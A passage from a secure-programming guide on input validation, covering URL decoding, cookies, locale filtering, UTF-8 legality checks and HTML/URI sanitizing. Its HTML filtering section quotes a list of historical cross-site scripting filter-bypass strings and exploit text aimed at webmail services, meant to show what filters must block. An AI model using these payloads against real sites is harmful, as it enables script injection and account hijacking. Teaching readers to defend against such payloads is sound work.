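    size_t o = 0;
    if (outlen == 0)
        return -1;
    while (*in != '\0') {
        char c = *in;
        if (c == '%') {
            if (!isxdigit((unsigned char)in[1]) ||
                !isxdigit((unsigned char)in[2]))
                return -1;      /* malformed escape */
            char hex[3] = { in[1], in[2], '\0' };
            c = (char)strtol(hex, NULL, 16);
            if (c == '\0')
                return -1;      /* reject encoded NIL */
            in += 3;
        } else {
            in++;
        }
        if (o + 1 >= outlen)
            return -1;          /* output buffer too small */
        out[o++] = c;
    }
    out[o] = '\0';
    return 0;
}
```

Note that ``%2500'' correctly decodes to the literal three characters ``%00''; only a second, erroneous decoding pass would turn that into a NIL.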
CGI scripts are commonly attacked by including special characters in their
inputs; see the comments above.
Another form of data available to web-based applications is ``cookies.''
Again, users can provide arbitrary cookie values, so they cannot be trusted
unless special precautions are taken. Also, cookies can be used to track
users, potentially invading user privacy. As a result, many users disable
cookies, so if possible your web application should be designed so that it
does not require the use of cookies (but see my later discussion for when you
must authenticate individual users). I encourage you to avoid or limit the
use of persistent cookies (cookies that last beyond a current session),
because they are easily abused. Indeed, U.S. agencies are currently forbidden
to use persistent cookies except in special circumstances, because of the
concern about invading user privacy; see the OMB guidance in memorandum
M-00-13 (June 22, 2000). Note that to use cookies, some browsers may insist
that you have a privacy profile (named p3p.xml on the root directory of the
server).
Some HTML forms include client-side input checking to prevent some illegal
values; these are typically implemented using Javascript/ECMAscript or Java.
This checking can be helpful for the user, since it can happen
``immediately'' without requiring any network access. However, this kind of
input checking is useless for security, because attackers can send such
``illegal'' values directly to the web server without going through the
checks. It's not even hard to subvert this; you don't have to write a program
to send arbitrary data to a web application. In general, servers must perform
all their own input checking (of form data, cookies, and so on) because they
cannot trust clients to do this securely. In short, clients are generally not
``trustworthy channels''. See Section 7.11 for more information on
trustworthy channels.
A brief discussion on input validation for those using Microsoft's Active
Server Pages (ASP) is available from Jerry Connolly at [http://
heap.nologin.net/aspsec.html] http://heap.nologin.net/aspsec.html
-----------------------------------------------------------------------------
5.7. Other Inputs
Programs must ensure that all inputs are controlled; this is particularly
difficult for setuid/setgid programs because they have so many such inputs.
Other inputs programs must consider include the current directory, signals,
memory maps (mmaps), System V IPC, pending timers, resource limits, the
scheduling priority, and the umask (which determines the default permissions
of newly-created files). Consider explicitly changing directories (using
chdir(2)) to an appropriate, fully-qualified directory at program startup.
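For example, the umask and current directory can be pinned down explicitly at startup instead of being inherited (a sketch; a real program would chdir() to its own data directory rather than ``/''):

```c
#include <assert.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Sketch: don't inherit the invoker's umask or working directory.
 * "/" is used here only as a safe, always-present placeholder for
 * the program's real fully-qualified data directory. */
static void sanitize_startup(void)
{
    umask(077);                 /* new files default to owner-only */
    if (chdir("/") != 0)
        _exit(1);
}
```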
-----------------------------------------------------------------------------
5.8. Human Language (Locale) Selection
As more people have computers and the Internet available to them, there has
been increasing pressure for programs to support multiple human languages and
cultures. This combination of language and other cultural factors is usually
called a ``locale''. The process of modifying a program so it can support
multiple locales is called ``internationalization'' (i18n), and the process
of providing the information for a particular locale to a program is called
``localization'' (l10n).
Overall, internationalization is a good thing, but this process provides
another opportunity for a security exploit. Since a potentially untrusted
user provides information on the desired locale, locale selection becomes
another input that, if not properly protected, can be exploited.
-----------------------------------------------------------------------------
5.8.1. How Locales are Selected
In locally-run programs (including setuid/setgid programs), locale
information is provided by an environment variable. Thus, like all other
environment variables, these values must be extracted and checked against
valid patterns before use.
For web applications, this information can be obtained from the web browser
(via the Accept-Language request header). However, since not all web browsers
properly pass this information (and not all users configure their browsers
properly), this is used less often than you might think. Often, the language
requested in a web browser is simply passed in as a form value. Again, these
values must be checked for validity before use, as with any other form value.
In either case, locale information is really just a special case of input
discussed in the previous sections. However, because this input is so rarely
considered, I'm discussing it separately. In particular, when combined with
format strings (discussed later), user-controlled strings can permit
attackers to force other programs to run arbitrary instructions, corrupt
data, and do other unfortunate actions.
-----------------------------------------------------------------------------
5.8.2. Locale Support Mechanisms
There are two major library interfaces for supporting locale-selected
messages on Unix-like systems, one called ``catgets'' and the other called
``gettext''. In the catgets approach, every string is assigned a unique
number, which is used as an index into a table of messages. In contrast, in
the gettext approach, a string (usually in English) is used to look up a
table that translates the original string. catgets(3) is an accepted standard
(via the X/Open Portability Guide, Volume 3 and Single Unix Specification),
so it's possible your program uses it. The ``gettext'' interface is not an
official standard, (though it was originally a UniForum proposal), but I
believe it's the more widely used interface (it's used by Sun and essentially
all GNU programs).
In theory, catgets should be slightly faster, but this is at best marginal on
today's machines, and the bookkeeping effort to keep unique identifiers valid
in catgets() makes the gettext() interface much easier to use. I'd suggest
using gettext(), just because it's easier to use. However, don't take my word
for it; see GNU's documentation on gettext (info:gettext#catgets) for a
longer and more descriptive comparison.
The catgets(3) call (and its associated catopen(3) call) in particular is
vulnerable to security problems, because the environment variable NLSPATH can
be used to control the filenames used to acquire internationalized messages.
The GNU C library ignores NLSPATH for setuid/setgid programs, which helps,
but that doesn't protect programs running on other implementations, nor other
programs (like CGI scripts) which don't ``appear'' to require such
protection.
The widely-used ``gettext'' interface is at least not vulnerable to a
malicious NLSPATH setting to my knowledge. However, it appears likely to me
that malicious settings of LC_ALL or LC_MESSAGES could cause problems. Also,
if you use gettext's bindtextdomain() routine in its file cat-compat.c, that
does depend on NLSPATH.
-----------------------------------------------------------------------------
5.8.3. Legal Values
For the moment, if you must permit untrusted users to set information on
their desired locales, make sure the provided internationalization
information meets a narrow filter that only permits legitimate locale names.
For user programs (especially setuid/setgid programs), these values will come
in via NLSPATH, LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_*
values (especially LC_MESSAGES, but also including LC_COLLATE, LC_CTYPE,
LC_MONETARY, LC_NUMERIC, and LC_TIME). For web applications, this
user-requested set of language information would be done via the
Accept-Language request header or a form value (the application should
indicate the actual language setting of the data being returned via the
Content-Language heading). You can check this value as part of your
environment variable filtering if your users can set your environment
variables (i.e., setuid/setgid programs) or as part of your input filtering
(e.g., for CGI scripts). The GNU C library "glibc" doesn't accept some values
of LANG for setuid/setgid programs (in particular anything with "/"), but
errors have been found in that filtering (e.g., Red Hat released an update to
fix this error in glibc on September 1, 2000). This kind of filtering isn't
required by any standard, so you're safer doing this filtering yourself. I
have not found any guidance on filtering language settings, so here are my
suggestions based on my own research into the issue.
First, a few words about the legal values of these settings. Language
settings are generally set using the standard tags defined in IETF RFC 1766
(which uses two-letter country codes as its basic tag, followed by an
optional subtag separated by a dash; I've found that environment variable
settings use the underscore instead). However, some find this insufficiently
flexible, so three-letter country codes may soon be used as well. Also, there
are two major not-quite compatible extended formats, the X/Open Format and
the CEN Format (European Community Standard); you'd like to permit both.
Typical values include ``C'' (the C locale), ``EN'' (English), and
``FR_fr'' (French using the territory of France's conventions). Also, so many
people use nonstandard names that programs have had to develop ``alias''
systems to cope with nonstandard names (for GNU gettext, see /usr/share/
locale/locale.alias, and for X11, see /usr/lib/X11/locale/locale.alias; you
might need "aliases" instead of "alias"); they should usually be permitted as
well. Libraries like gettext() have to accept all these variants and find an
appropriate value, where possible. One source of further information is FSF
[1999]; another source is the li18nux.org web site. A filter should not
permit characters that aren't needed, in particular ``/'' (which might permit
escaping out of the trusted directories) and ``..'' (which might permit going
up one directory). Other dangerous characters in NLSPATH include ``%'' (which
indicates substitution) and ``:'' (which is the directory separator); the
documentation I have for other machines suggests that some implementations
may use them for other values, so it's safest to prohibit them.
-----------------------------------------------------------------------------
5.8.4. Bottom Line
In short, I suggest simply erasing or re-setting the NLSPATH, unless you have
a trusted user supplying the value. For the Accept-Language heading in HTTP
(if you use it), form values specifying the locale, and the environment
variables LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_* values
listed above, filter the locales from untrusted users to permit null (empty)
values or to only permit values that match in total this regular expression
(note that I've recently added "="):
[A-Za-z][A-Za-z0-9_,+@\-\.=]*
I haven't found any legitimate locale which doesn't match this pattern, but
this pattern does appear to protect against locale attacks. Of course,
there's no guarantee that there are messages available in the requested
locale, but in such a case these routines will fall back to the default
messages (usually in English), which at least is not a security problem.
If you wish to be really picky, and accept only patterns that match li18nux's
locale pattern, you can use this pattern instead:
^[A-Za-z]+(_[A-Za-z]+)?
(\.[A-Z]+(\-[A-Z0-9]+)*)?
(\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
(,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
In both cases, these patterns use POSIX's extended (``modern'') regular
expression notation (see regex(3) and regex(7) on Unix-like systems).
Of course, languages cannot be supported without a standard way to represent
their written symbols, which brings us to the issue of character encoding.
-----------------------------------------------------------------------------
5.9. Character Encoding
5.9.1. Introduction to Character Encoding
For many years Americans have exchanged text using the ASCII character set;
since essentially all U.S. systems support ASCII, this permits easy exchange
of English text. Unfortunately, ASCII is completely inadequate in handling
the characters of nearly all other languages. For many years different
countries have adopted different techniques for exchanging text in different
languages, making it difficult to exchange data in an increasingly
interconnected world.
More recently, ISO has developed ISO 10646, the ``Universal Multiple-Octet
Coded Character Set'' (UCS). UCS is a coded character set which defines a
single 31-bit value for each of the world's characters. The first
65536 characters of the UCS (which thus fit into 16 bits) are termed the
``Basic Multilingual Plane'' (BMP), and the BMP is intended to cover nearly
all of today's spoken languages. The Unicode forum develops the Unicode
standard, which concentrates on the UCS and adds some additional conventions
to aid interoperability. Historically, Unicode and ISO 10646 were developed
by competing groups, but thankfully they realized that they needed to work
together and they now coordinate with each other.
If you're writing new software that handles internationalized characters, you
should be using ISO 10646/Unicode as your basis for handling international
characters. However, you may need to process older documents in various older
(language-specific) character sets, in which case, you need to ensure that an
untrusted user cannot control the setting of another document's character set
(since this would significantly affect the document's interpretation).
-----------------------------------------------------------------------------
5.9.2. Introduction to UTF-8
Most software is not designed to handle 16 bit or 32 bit characters, yet to
create a universal character set more than 8 bits was required. Therefore, a
special format called ``UTF-8'' was developed to encode these potentially
international characters in a format more easily handled by existing programs
and libraries. UTF-8 is defined, among other places, in IETF RFC 2279, so
it's a well-defined standard that can be freely read and used. UTF-8 is a
variable-width encoding; characters numbered 0 to 0x7f (127) encode to
themselves as a single byte, while characters with larger values are encoded
into 2 to 6 bytes of information (depending on their value). The encoding has
been specially designed to have the following nice properties (this
information is from the RFC and Linux utf-8 man page):
  * The classical US ASCII characters (0 to 0x7f) encode as themselves, so
    files and strings which contain only 7-bit ASCII characters have the
    same encoding under both ASCII and UTF-8. This is fabulous for backward
    compatibility with the many existing U.S. programs and data files.
  * All UCS characters beyond 0x7f are encoded as a multibyte sequence
    consisting only of bytes in the range 0x80 to 0xfd. This means that no
    ASCII byte can appear as part of another character. Many other encodings
    permit characters such as an embedded NIL, causing programs to fail.
  * It's easy to convert between UTF-8 and the 2-byte and 4-byte fixed-width
    representations of characters (these are called UCS-2 and UCS-4
    respectively).
  * The lexicographic sorting order of UCS-4 strings is preserved, and the
    Boyer-Moore fast search algorithm can be used directly with UTF-8 data.
  * All possible 2^31 UCS codes can be encoded using UTF-8.
  * The first byte of a multibyte sequence which represents a single
    non-ASCII UCS character is always in the range 0xc0 to 0xfd and
    indicates how long this multibyte sequence is. All further bytes in a
    multibyte sequence are in the range 0x80 to 0xbf. This allows easy
    resynchronization; if a byte is missing, it's easy to skip forward to
    the ``next'' character, and it's always easy to skip forward and back
    to the ``next'' or ``preceding'' character.
In short, the UTF-8 transformation format is becoming a dominant method for
exchanging international text information because it can support all of the
world's languages, yet it is backward compatible with U.S. ASCII files as
well as having other nice properties. For many purposes I recommend its use,
particularly when storing data in a ``text'' file.
-----------------------------------------------------------------------------
5.9.3. UTF-8 Security Issues
The reason to mention UTF-8 is that some byte sequences are not legal UTF-8,
and this might be an exploitable security hole. UTF-8 encoders are supposed
to use the ``shortest possible'' encoding, but naive decoders may accept
encodings that are longer than necessary. Indeed, earlier standards permitted
decoders to accept ``non-shortest form'' encodings. The problem here is that
this means that potentially dangerous input could be represented multiple
ways, and thus might defeat the security routines checking for dangerous
inputs. The RFC describes the problem this way:
Implementers of UTF-8 need to consider the security aspects of how they
handle illegal UTF-8 sequences. It is conceivable that in some
circumstances an attacker would be able to exploit an incautious UTF-8
parser by sending it an octet sequence that is not permitted by the UTF-8
syntax.
A particularly subtle form of this attack could be carried out against a
parser which performs security-critical validity checks against the UTF-8
encoded form of its input, but interprets certain illegal octet sequences
as characters. For example, a parser might prohibit the NUL character
when encoded as the single-octet sequence 00, but allow the illegal
two-octet sequence C0 80 (illegal because it's longer than necessary) and
interpret it as a NUL character (00). Another example might be a parser
which prohibits the octet sequence 2F 2E 2E 2F ("/../"), yet permits the
illegal octet sequence 2F C0 AE 2E 2F.
A longer discussion about this is available at Markus Kuhn's UTF-8 and
Unicode FAQ for Unix/Linux at [http://www.cl.cam.ac.uk/~mgk25/unicode.html]
http://www.cl.cam.ac.uk/~mgk25/unicode.html.
-----------------------------------------------------------------------------
5.9.4. UTF-8 Legal Values
Thus, when accepting UTF-8 input, you need to check if the input is valid
UTF-8. Here is a list of all legal UTF-8 sequences; any character sequence
not matching this table is not a legal UTF-8 sequence. In the following
table, the first column shows the various character values being encoded into
UTF-8. The second column shows how those characters are encoded as binary
values; an ``x'' indicates where the data is placed (either a 0 or 1), though
some values should not be allowed because they're not the shortest possible
encoding. The last row shows the valid values each byte can have (in
hexadecimal). Thus, a program should check that every character meets one of
the patterns in the right-hand column. A ``-'' indicates a range of legal
values (inclusive). Of course, just because a sequence is a legal UTF-8
sequence doesn't mean that you should accept it (you still need to do all
your other checking), but generally you should check any UTF-8 data for UTF-8
legality before performing other checks.
Table 5-1. Legal UTF-8 Sequences
+------------------------+-------------------------+------------------------+
|UCS Code (Hex) |Binary UTF-8 Format |Legal UTF-8 Values (Hex)|
+------------------------+-------------------------+------------------------+
|00-7F |0xxxxxxx |00-7F |
+------------------------+-------------------------+------------------------+
|80-7FF |110xxxxx 10xxxxxx |C2-DF 80-BF |
+------------------------+-------------------------+------------------------+
|800-FFF |1110xxxx 10xxxxxx |E0 A0*-BF 80-BF |
| |10xxxxxx | |
+------------------------+-------------------------+------------------------+
|1000-FFFF |1110xxxx 10xxxxxx |E1-EF 80-BF 80-BF |
| |10xxxxxx | |
+------------------------+-------------------------+------------------------+
|10000-3FFFF |11110xxx 10xxxxxx |F0 90*-BF 80-BF 80-BF |
| |10xxxxxx 10xxxxxx | |
+------------------------+-------------------------+------------------------+
|40000-FFFFFF |11110xxx 10xxxxxx |F1-F3 80-BF 80-BF 80-BF |
| |10xxxxxx 10xxxxxx | |
+------------------------+-------------------------+------------------------+
|100000-10FFFFF |11110xxx 10xxxxxx |F4 80-8F* 80-BF 80-BF |
| |10xxxxxx 10xxxxxx | |
+------------------------+-------------------------+------------------------+
|200000-3FFFFFF |111110xx 10xxxxxx |too large; see below |
| |10xxxxxx 10xxxxxx | |
| |10xxxxxx | |
+------------------------+-------------------------+------------------------+
|04000000-7FFFFFFF |1111110x 10xxxxxx |too large; see below |
| |10xxxxxx 10xxxxxx | |
| |10xxxxxx 10xxxxxx | |
+------------------------+-------------------------+------------------------+
As I noted earlier, there are two standards for character sets, ISO 10646 and
Unicode, who have agreed to synchronize their character assignments. The
definition of UTF-8 in ISO/IEC 10646-1:2000 and the IETF RFC also currently
support five and six byte sequences to encode characters outside the range
supported by Uniforum's Unicode, but such values can't be used to support
Unicode characters and it's expected that a future version of ISO 10646 will
have the same limits. Thus, for most purposes the five and six byte UTF-8
encodings aren't legal, and you should normally reject them (unless you have
a special purpose for them).
This set of valid values is tricky to determine, and in fact earlier
versions of this document got some entries wrong (in some cases it permitted
overlong characters). Language developers should include a function in their
libraries to check for valid UTF-8 values, just because it's so hard to get
right.
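Such a checking function might look like the following sketch, which follows Table 5-1 (it also rejects the 5- and 6-byte forms; note that it does not reject UTF-16 surrogate code points, a refinement the table predates):

```c
#include <assert.h>
#include <stddef.h>

/* Sketch of a strict UTF-8 validity check following Table 5-1:
 * overlong forms and 5/6-byte sequences are refused; surrogate
 * code points are NOT checked here. */
static int utf8_valid(const unsigned char *s, size_t n)
{
    size_t i = 0;
    while (i < n) {
        unsigned char b = s[i];
        size_t len;
        if (b <= 0x7F) { i++; continue; }
        else if (b >= 0xC2 && b <= 0xDF) len = 2;
        else if (b >= 0xE0 && b <= 0xEF) len = 3;
        else if (b >= 0xF0 && b <= 0xF4) len = 4;
        else return 0;          /* C0, C1, F5-FF can never appear */
        if (i + len > n) return 0;      /* truncated sequence */
        for (size_t j = 1; j < len; j++)
            if (s[i + j] < 0x80 || s[i + j] > 0xBF) return 0;
        /* second-byte restrictions that forbid overlong/oversized forms */
        if (b == 0xE0 && s[i + 1] < 0xA0) return 0;
        if (b == 0xF0 && s[i + 1] < 0x90) return 0;
        if (b == 0xF4 && s[i + 1] > 0x8F) return 0;
        i += len;
    }
    return 1;
}
```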
I should note that in some cases, you might want to cut some slack for (or
internally use) the hexadecimal sequence C0 80. This is an overlong sequence
that, if permitted, can represent ASCII NUL (NIL). Since C and C++ have
trouble including a NIL character in an ordinary string, some people have
taken to using this sequence when they want to represent NIL as part of the
data stream; Java even enshrines the practice. Feel free to use C0 80
internally while processing data, but technically you really should translate
this back to 00 before saving the data. Depending on your needs, you might
decide to be ``sloppy'' and accept C0 80 as input in a UTF-8 data stream. If
it doesn't harm security, it's probably a good practice to accept this
sequence since accepting it aids interoperability.
Handling this can be tricky. You might want to examine the C routines
developed by Unicode to handle conversions, available at [ftp://
ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c] ftp://ftp.unicode.org/
Public/PROGRAMS/CVTUTF/ConvertUTF.c. It's unclear to me if these routines are
open source software (the licenses don't clearly say whether or not they can
be modified), so beware of that.
-----------------------------------------------------------------------------
5.9.5. UTF-8 Related Issues
This section has discussed UTF-8, because it's the most popular multibyte
encoding of UCS, simplifying a lot of international text handling issues.
However, it's certainly not the only encoding; there are other encodings,
such as UTF-16 and UTF-7, which have the same kinds of issues and must be
validated for the same reasons.
Another issue is that some phrases can be expressed in more than one way in
ISO 10646/Unicode. For example, some accented characters can be represented
as a single character (with the accent) and also as a set of characters
(e.g., the base character plus a separate composing accent). These two forms
may appear identical. There's also a zero-width space that could be inserted,
with the result that apparently-similar items are considered different.
Beware of situations where such hidden text could interfere with the program.
This is an issue that in general is hard to solve; most programs don't have
such tight control over the clients that they know completely how a
particular sequence will be displayed (since this depends on the client's
font, display characteristics, locale, and so on).
-----------------------------------------------------------------------------
5.10. Prevent Cross-site Malicious Content on Input
Some programs accept data from one untrusted user and pass that data on to a
second user; the second user's application may then process that data in a
way harmful to the second user. This is a particularly common problem for web
applications; we'll call this problem ``cross-site malicious content.'' In
short, you cannot accept input (including any form data) without checking,
filtering, or encoding it. For more information, see Section 7.15.
Fundamentally, this means that all web application input must be filtered (so
characters that can cause this problem are removed), encoded (so the
characters that can cause this problem are encoded in a way to prevent the
problem), or validated (to ensure that only ``safe'' data gets through).
Filtering and validation should often be done at the input, but encoding can
be done either at input or output time. If you're just passing the data
through without analysis, it's probably better to encode the data on input
(so it won't be forgotten), but if you're processing the data, there are
arguments for encoding on output instead.
-----------------------------------------------------------------------------
5.11. Filter HTML/URIs That May Be Re-presented
One special case where cross-site malicious content must be prevented are web
applications which are designed to accept HTML or XHTML from one user, and
then send it on to other users (see Section 7.15 for more information on
cross-site malicious content). The following subsections discuss filtering
this specific kind of input, since handling it is such a common requirement.
-----------------------------------------------------------------------------
5.11.1. Remove or Forbid Some HTML Data
It's safest to remove all possible (X)HTML tags so they cannot affect
anything, and this is relatively easy to do. As noted above, you should
already be identifying the list of legal characters, and rejecting or
removing those characters that aren't in the list. In this filter, simply
don't include the following characters in the list of legal characters: ``<
'', ``>'', and ``&'' (and if they're used in attributes, the double-quote
character ``"''). If browsers only operated according to the HTML
specifications, the ``>'' wouldn't need to be removed, but in practice it
must be removed. This is because some browsers assume that the author of the
page really meant to put in an opening "<" and ``helpfully'' insert one -
attackers can exploit this behavior and use the ">" to create an undesired "<
".
Usually the character set for transmitting HTML is ISO-8859-1 (even when
sending international text), so the filter should also omit most control
characters (linefeed and tab are usually okay) and characters with their
high-order bit set.
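As an illustration (a sketch, not part of the original text), the filter described above can be written as a simple character whitelist; anything not in the list of legal characters is quietly removed:

```python
# Keep only a list of legal characters: printable ASCII minus the
# HTML-critical "<", ">", "&", and '"', with linefeed and tab allowed.
# Characters with the high-order bit set are excluded automatically.
LEGAL = set(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    " !#$%'()*+,-./:;=?@[\\]^_`{|}~\n\t"
)

def strip_illegal(text: str) -> str:
    """Remove every character that is not in the legal list."""
    return "".join(ch for ch in text if ch in LEGAL)

assert strip_illegal('<script>alert("x")&y</script>') == 'scriptalert(x)y/script'
```

As the next paragraph notes, silently dropping characters this way can surprise users; rejecting with an error message, or encoding, are alternatives.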
One problem with this approach is that it can really surprise users,
especially those entering international text if all international text is
quietly removed. If the invalid characters are quietly removed without
warning, that data will be irrevocably lost and cannot be reconstructed
later. One alternative is forbidding such characters and sending error
messages back to users who attempt to use them. This at least warns users,
but doesn't give them the functionality they were looking for. Other
alternatives are encoding this data or validating this data, which are
discussed next.
-----------------------------------------------------------------------------
5.11.2. Encoding HTML Data
An alternative that is nearly as safe is to transform the critical characters
so they won't have their usual meaning in HTML. This can be done by
translating all "<" into "&lt;", ">" into "&gt;", and "&" into "&amp;".
Arbitrary international characters can be encoded in Latin-1 using the format
"&#value;" - do not forget the ending semicolon. Encoding the international
characters means you must know what the input encoding was, of course.
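A minimal sketch of this translation in Python follows (the standard library's html.escape does the same job); note that ``&'' must be replaced first, or the other substitutions would themselves be re-encoded:

```python
# Encode the critical HTML characters so they lose their usual meaning.
def encode_html(text: str) -> str:
    text = text.replace("&", "&amp;")   # must come first
    text = text.replace("<", "&lt;")
    text = text.replace(">", "&gt;")
    text = text.replace('"', "&quot;")  # needed if output lands in attributes
    return text

assert encode_html('<b>"AT&T"</b>') == '&lt;b&gt;&quot;AT&amp;T&quot;&lt;/b&gt;'
```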
One possible danger here is that if these encodings are accidentally
interpreted twice, they will become a vulnerability. However, this approach
at least permits later users to see the "intent" of the input.
-----------------------------------------------------------------------------
5.11.3. Validating HTML Data
Some applications, to work at all, must accept HTML from third parties and
send them on to their users. Beware - you are treading dangerous ground at
this point; be sure that you really want to do this. Even the idea of
accepting HTML from arbitrary places is controversial among some security
practitioners, because it is extremely difficult to get it right.
However, if your application must accept HTML, and you believe that it's
worth the risk, at least identify a list of ``safe'' HTML commands and only
permit those commands.
Here is a minimal set of safe HTML tags that might be useful for applications
(such as guestbooks) that support short comments: <p> (paragraph), <b>
(bold), <i> (italics), <em> (emphasis), <strong> (strong emphasis), <pre>
(preformatted text), <br> (forced line break - note it doesn't require a
closing tag), as well as all their ending tags.
Not only do you need to ensure that only a small set of ``safe'' HTML
commands are accepted, you also need to ensure that they are properly nested
and closed (i.e., that the HTML commands are ``balanced''). In XML, this is
termed ``well-formed'' data. A few exceptions could be made if you're
accepting standard HTML (e.g., supporting an implied </p> where not provided
before a <p> would be fine), but trying to accept HTML in its full generality
(which can infer balancing closing tags in many cases) is not needed for most
applications. Indeed, if you're trying to stick to XHTML (instead of HTML),
then well-formedness is a requirement. Also, HTML tags are case-insensitive;
tags can be upper case, lower case, or a mixture. However, if you intend to
accept XHTML then you need to require all tags to be in lower case (XML is
case-sensitive; XHTML uses XML and requires the tags to be in lower case).
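The whitelist-plus-balancing check can be sketched with Python's standard HTML parser. This is purely illustrative, not a vetted sanitizer: it accepts only the minimal tag set listed above, rejects all attributes, and requires proper nesting (with <br> exempt from needing a closing tag):

```python
from html.parser import HTMLParser

SAFE_TAGS = {"p", "b", "i", "em", "strong", "pre", "br"}

class SafeHTMLChecker(HTMLParser):
    """Accept only SAFE_TAGS, with no attributes, properly nested."""
    def __init__(self):
        super().__init__()
        self.stack = []   # currently-open tags
        self.ok = True

    def handle_starttag(self, tag, attrs):
        if tag not in SAFE_TAGS or attrs:   # no attributes allowed at all
            self.ok = False
        elif tag != "br":                   # <br> needs no closing tag
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if not self.stack or self.stack.pop() != tag:
            self.ok = False                 # unopened or badly nested

def is_safe_html(text: str) -> bool:
    checker = SafeHTMLChecker()
    checker.feed(text)
    checker.close()
    return checker.ok and not checker.stack  # everything opened was closed

assert is_safe_html("<p><b>hi</b></p>")
assert not is_safe_html("<script>alert(1)</script>")
assert not is_safe_html("<b><i>bad nesting</b></i>")
```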
Here are a few random tips about doing this. Usually you should design
whatever surrounds the HTML text and the set of permitted tags so that the
contributed text cannot be misinterpreted as text from the ``main'' site (to
prevent forgeries). Don't accept any attributes unless you've checked the
attribute type and its value; there are many attributes that support things
such as Javascript that can cause trouble for your users. You'll notice that
in the above list I didn't include any attributes at all, which is certainly
the safest course. You should probably give a warning message if an unsafe
tag is used, but if that's not practical, encoding the critical characters
(e.g., "<" becomes "&lt;") prevents data loss while simultaneously keeping
the users safe.
Be careful when expanding this set, and in general be restrictive of what you
accept. If your patterns are too generous, the browser may interpret the
sequences differently than you expect, resulting in a potential exploit. For
example, FozZy posted on Bugtraq (1 April 2002) some sequences that permitted
exploitation in various web-based mail systems, which may give you an idea of
the kinds of problems you need to defend against. Here's some exploit text
that, at one time, could subvert user accounts in Microsoft Hotmail:
<SCRIPT>
</COMMENT>
<!-- --> -->
Here's some similar exploit text for Yahoo! Mail:
<_a<script>
<<script> (Note: this was found by BugSan)
Here's some exploit text for Vizzavi:
<b onmousover="...">go here</b>
<img [line_break] src="javascript:alert(document.location)">
Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various text that
invokes Javascript yet manages to bypass many filters. Here are his examples
(which he says he cut and pasted from elsewhere); some only apply to specific
browsers (IE means Internet Explorer, N4 means Netscape version 4).
<a href="javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
<![CDATA[<!--]] ><script>[code]//--></script>
This is not a complete list, of course, but it at least is a sample of the
kinds of attacks that you must prevent by strictly limiting the tags and
attributes you can allow from untrusted users.
Konstantin Riabitsev has posted [http://www.mricon.com/html/phpfilter.html]
some PHP code to filter HTML (GPL); I've not examined it closely, but you
might want to take a look.
-----------------------------------------------------------------------------
5.11.4. Validating Hypertext Links (URIs/URLs)
Careful readers will notice that I did not include the hypertext link tag <a>
as a safe tag in HTML. Clearly, you could add <a href="safe URI"> (hypertext
link) to the safe list (not permitting any other attributes unless you've
checked their contents). If your application requires it, then do so.
However, permitting third parties to create links is much less safe, because
defining a ``safe URI''[1] turns out to be very difficult. Many browsers
accept all sorts of URIs which may be dangerous to the user. This section
discusses how to validate URIs from third parties for re-presenting to
others, including URIs incorporated into HTML.
First, let's look briefly at URI syntax (as defined by various
specifications). URIs can be either ``absolute'' or ``relative''. The syntax
of an absolute URI looks like this:
scheme://authority[path][?query][#fragment]
A URI starts with a scheme name (such as ``http''), the characters ``://'',
the authority (such as ``www.dwheeler.com''), a path (which looks like a
directory or file name), a question mark followed by a query, and a hash (``#
'') followed by a fragment identifier. The square brackets surround optional
portions - e.g., many URIs don't actually include the query or fragment. Some
schemes may not permit some of the data (e.g., paths, queries, or fragments),
and many schemes have additional requirements unique to them. Many schemes
permit the ``authority'' field to identify optional usernames, passwords, and
ports, using this syntax for the ``authority'' section:
[username[:password]@]host[:portnumber]
The ``host'' can either be a name (``www.dwheeler.com'') or an IPv4 numeric
address (127.0.0.1). A ``relative'' URI references one object relative to the
``current'' one, and its syntax looks a lot like a filename:
path[?query][#fragment]
There are a limited number of characters permitted in most of the URI, so to
get around this problem, other 8-bit characters may be ``URL encoded'' as %hh
(where hh is the hexadecimal value of the 8-bit character). For more detailed
information on valid URIs, see IETF RFC 2396 and its related specifications.
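A quick illustration of %hh encoding, using Python's urllib.parse (not part of the original text), also hints at why escaped forms complicate checks such as forbidding ``../'':

```python
from urllib.parse import quote, unquote

assert quote(" ") == "%20"                  # space becomes %20
assert quote("/a b", safe="/") == "/a%20b"  # encode within a path
assert unquote("%2e%2e%2f") == "../"        # escapes can hide "../"
```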
Now that we've looked at the syntax of URIs, let's examine the risks of each
part:
  * Scheme: Many schemes are downright dangerous. Permitting someone to
insert a ``javascript'' scheme into your material would allow them to
trivially mount denial-of-service attacks (e.g., by repeatedly creating
windows so the user's machine freezes or becomes unusable). More
seriously, they might be able to exploit a known vulnerability in the
javascript implementation. Some schemes can be a nuisance, such as
``mailto:'' when a mailing is not expected, and some schemes may not be
sufficiently secure on the client machine. Thus, it's necessary to limit
